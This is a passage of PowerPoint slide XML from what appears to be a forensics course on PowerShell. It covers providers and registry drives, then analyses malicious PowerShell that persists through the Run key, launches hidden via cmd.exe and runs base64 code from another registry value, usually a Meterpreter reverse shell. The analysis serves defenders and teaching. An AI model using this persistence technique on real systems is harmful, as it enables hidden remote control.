                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    E:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Environment</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Function                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Function</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HKCU                                   Registry      HKEY_CURRENT_USER</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HKLM                                   Registry      HKEY_LOCAL_MACHINE</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Variable                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Variable</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err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WSMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WSMan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Drives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602187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The PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Environment provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>lets you get, add, change, clear, and delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>environment variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and values in PowerShell.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54212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26</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2714523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1988840"/>
            <a:ext cx="8712968" cy="1218448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>following registry key: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Underneath </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the value "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hztGpoWa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" the following entry is made:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Malicious PowerShell in the Registry: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>Mari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>DeGrazia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://2.bp.blogspot.com/-IFIbyYxPrKs/WyChOgqxxaI/AAAAAAAAENM/9xH45bbxR9IYRmcRswVOU3N0ZLSkezx3QCLcBGAs/s1600/powershell_in_registry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212976"/>
            <a:ext cx="8839994" cy="3052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665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4115627"/>
            <a:ext cx="8496944" cy="2121685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%COMSPEC% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is the system variable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to launch PowerShell in a hidden window. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>then uses the PowerShell command  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" to get another registry key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM:Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\4MX64uqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dp8m09KD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> under that key.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Content of Key Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>Mari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>DeGrazia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="https://1.bp.blogspot.com/-rdeMn1V08wo/WyDGBDk7QTI/AAAAAAAAEOE/Ki3BT4eN13cN6dVb1IcMQK9Jd_xeQr_gwCLcBGAs/s1600/rr_outpu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77" y="2204864"/>
            <a:ext cx="8938919"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219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44016" y="2132855"/>
            <a:ext cx="1979712" cy="3096345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Base 64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>The resulting code more often than not is a way to establish a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="338328"/>
            <a:ext cx="9058472" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Key Value Data  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM:Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\4MX64uqR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>Mari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="author profile"/>
              </a:rPr>
              <a:t>DeGrazia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="https://4.bp.blogspot.com/-_z_cHr0Gq7k/WyEhvGS6bLI/AAAAAAAAEOQ/mF82pP37Ss8gmT3tqqB3PAsyiN2sOLiWACLcBGAs/s1600/b64_registr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628800"/>
            <a:ext cx="6791406" cy="4706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45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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cmdlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> evaluates or runs a specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and returns the results of the expression or command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a string submitted at the command line is returned (echoed) unchanged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
